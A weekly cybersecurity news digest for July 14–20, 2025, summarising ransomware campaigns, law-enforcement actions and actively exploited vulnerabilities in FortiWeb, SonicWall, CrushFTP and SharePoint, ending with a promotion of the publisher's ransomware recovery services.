News Week: July 14th to July 20th, 2025

Interlock Ransomware Leverages FileFix and RDP in New Attack Wave

Interlock ransomware has recently adopted a stealthier attack method known as FileFix to deliver remote access trojans (RATs) onto victims’ systems. This method manipulates Windows elements like File Explorer to trick users into pasting disguised PowerShell commands, which then download malware hosted on platforms like trycloudflare.com. Once installed, the PHP-based RAT collects system and network data using PowerShell and exfiltrates it in JSON format. Researchers also observed post-infection activity such as Active Directory enumeration and remote desktop protocol (RDP) usage for lateral movement. These tactics highlight Interlock’s shift from its previous ClickFix-based delivery to more evasive techniques. By exploiting FileFix and RDP, the threat actor behind Interlock continues to evolve its campaign and bypass traditional detection methods. Security experts from Proofpoint and The DFIR Report have been tracking this evolution since May 2025, noting its increasing sophistication and reach.

Europol Disrupts NoName057(16) DDoS Group in Coordinated Crackdown

In a major operation dubbed “Operation Eastwood,” Europol and law enforcement agencies from 13 countries disrupted the pro-Russian hacktivist group NoName057(16), known for orchestrating widespread DDoS attacks across Europe, Ukraine, and Israel. Since its emergence in 2022, the group has used its “DDoSia” platform to crowdsource attacks via Telegram, targeting government institutions, energy providers, banks, and defense contractors. The coordinated action on July 15, 2025, resulted in the seizure of over 100 servers and arrests in France and Spain. Despite this blow, key members remain in Russia, and Europol warns the group may quickly rebuild its DDoS infrastructure. Germany alone suffered 14 attacks affecting over 230 entities, including arms manufacturers and public services. NoName057(16) continues to announce fresh DDoS campaigns, underlining the ongoing cyber threat even after law enforcement intervention.

Remote Code Execution via SQL Injection Hits FortiWeb Devices

Fortinet FortiWeb appliances are now actively being exploited through a critical SQL injection vulnerability tracked as CVE-2025-25257, enabling remote code execution (RCE) on unpatched systems. The flaw affects versions 7.6.0 to 7.6.3, 7.4.0 to 7.4.7, and 7.0.0 to 7.0.10, allowing attackers to send specially crafted HTTP requests to execute malicious code without authentication. After public proof-of-concept exploits were released on July 11, Shadowserver observed infections rapidly increasing, with 85 FortiWeb devices compromised in a single day. The attack injects code via SQLi in Authorization headers, drops a `.pth` payload, and executes it through a legitimate FortiWeb CGI script, achieving full RCE. Fortinet urged users to upgrade immediately, but over 200 management interfaces remain exposed globally, primarily in the U.S. Organizations unable to update should disable HTTP/HTTPS admin access to block exploitation via the vulnerable endpoint. This surge highlights the urgent risk of combining SQL injection with remote code execution.

Zero-Day Exploit Hits SonicWall SMA Devices with OVERSTEP Rootkit and Abyss Ransomware Links

A newly discovered user-mode rootkit dubbed OVERSTEP has been deployed in attacks on SonicWall SMA 100 Series appliances, exploiting a suspected zero-day vulnerability to gain deep persistence and stealth. Tracked by Google’s Threat Intelligence Group (GTIG), the threat actor UNC6148 used stolen administrator credentials to initiate reverse shells and bypass design restrictions, likely leveraging CVE-2024-38475 or another yet-undisclosed zero-day flaw. Once access was secured, OVERSTEP was installed, enabling long-term persistence, log tampering, and credential theft. The malware modifies the boot process and runs code with every dynamic executable launch. Overlaps with Abyss ransomware attacks suggest a dual-use campaign involving both espionage and extortion. Multiple past compromises involving Abyss were traced back to similar tactics—SMA device access, web shells, and firmware persistence. GTIG warns that OVERSTEP can extract sensitive items like OTP seeds and certificates. Organizations using end-of-life SMA appliances are urged to investigate with forensic imaging to detect rootkit interference.

DragonForce Ransomware Breach Exposes 6.5 Million Co-op Member Records

UK retail giant Co-op has confirmed that personal data belonging to all 6.5 million of its members was stolen in the April 2025 cyberattack involving the DragonForce ransomware group. The breach, now linked to the notorious threat actor Scattered Spider—previously tied to BlackCat ransomware—was far more severe than initially reported. Attackers gained entry via a social engineering tactic, allowing password reset and lateral movement within Co-op’s network. Critical files such as the NTDS.dit, which contains Windows password hashes, were exfiltrated. Co-op CEO Shirine Khoury-Haq publicly apologized, emphasizing the emotional toll on staff and members. While no financial data was compromised, contact information was accessed. Law enforcement has since arrested four individuals suspected of being involved in this and other high-profile attacks, including incidents targeting M&S and Harrods. The same group was previously linked to the MGM Resorts breach in 2023. Co-op’s case underscores the evolving threat posed by DragonForce, Scattered Spider, and BlackCat affiliates.

Phobos & 8Base Decryptor Recovers Files with Extensions Like .LIZARD, .faust, .phobos

Victims of the Phobos and 8Base ransomware families can now recover their encrypted data for free, thanks to a new decryptor released by the Japanese police and distributed via Europol’s NoMoreRansom platform. This marks a breakthrough against the long-running Phobos ransomware-as-a-service operation, known for enabling double extortion tactics—encrypting files while also stealing data for leverage. The decryptor supports a range of common ransomware file extensions, including .phobos, .8base, .elbie, .faust, and .LIZARD, and may work with additional variations not explicitly listed. These extensions represent some of the most prevalent seen in recent ransomware attacks. Users simply point the tool to affected folders, and it recursively decrypts files while preserving the original directory structure. This tool offers a lifeline to organizations hit by Phobos and its 8Base offshoot, especially as both leveraged aggressive double extortion strategies.

CrushFTP Zero-Day Exploit Allows Server Takeover via Web Interface

A newly discovered zero-day vulnerability tracked as CVE-2025-54309 is being actively exploited in the wild to hijack vulnerable CrushFTP servers. The flaw, which affects versions prior to CrushFTP v10.8.5 and v11.3.4_23, allows unauthenticated attackers to gain admin-level access through the HTTP(S) web interface. CrushFTP suspects threat actors reverse-engineered the software and identified the bug in earlier builds, exploiting it on unpatched systems. Although a previous unrelated patch incidentally blocked the vulnerability, only those running the latest builds are fully protected. The zero-day exploit modifies the default user configuration file, enabling unauthorized access through stealth admin accounts. Indicators include unusual logins and tampered user.XML files. While CrushFTP recommends using a DMZ setup, firms like Rapid7 warn that such configurations may not fully mitigate zero-day exploitation. This latest incident adds CrushFTP to the growing list of enterprise file transfer solutions targeted via zero-days for data theft and potential malware deployment, echoing past Clop ransomware campaigns.

Microsoft SharePoint Zero-Day Enables Remote Code Execution in Ongoing Attacks

Two critical zero-day vulnerabilities in Microsoft SharePoint, CVE-2025-53770 and CVE-2025-53771, are actively exploited in remote code execution (RCE) attacks, impacting on-premise servers worldwide. The flaws bypass Microsoft’s July patches for the original ToolShell exploit chain (CVE-2025-49706 + CVE-2025-49704), allowing attackers to upload malicious `.aspx` files such as spinstall0.aspx and steal cryptographic keys used to generate valid, signed __VIEWSTATE payloads. These payloads can then trigger RCE by injecting commands into the SharePoint server. Although emergency patches have been released for SharePoint 2016, 2019, and Subscription Edition, dozens of organizations, including government and private sector entities, have already been compromised. Microsoft urges admins to apply updates, enable AMSI, rotate machine keys, and disconnect unpatched servers from the internet. If ViewState keys are exposed, attackers can persistently craft valid tokens to execute malicious code server-side, making this one of the most dangerous RCE zero-days currently in the wild.

Conclusion

The recent zero-day vulnerabilities in Microsoft SharePoint highlight how even well-established enterprise platforms can become critical entry points for remote code execution attacks. As threat actors continue to exploit these flaws to gain unauthorized access and execute malicious code, organizations must act swiftly to patch systems and implement layered defenses.

As experts in ransomware recovery and cybersecurity, we offer specialized services such as Ransomware Recovery Services and Ransomware Negotiation Services. Our Cyber Defense Academy provides education to build resilience, while our Cybersecurity Risk Assessment and Incident Response Retainer help organizations proactively prepare for and respond to threats.

Reach out today to learn how our ransomware decryption service and cybersecurity solutions can help safeguard your operations.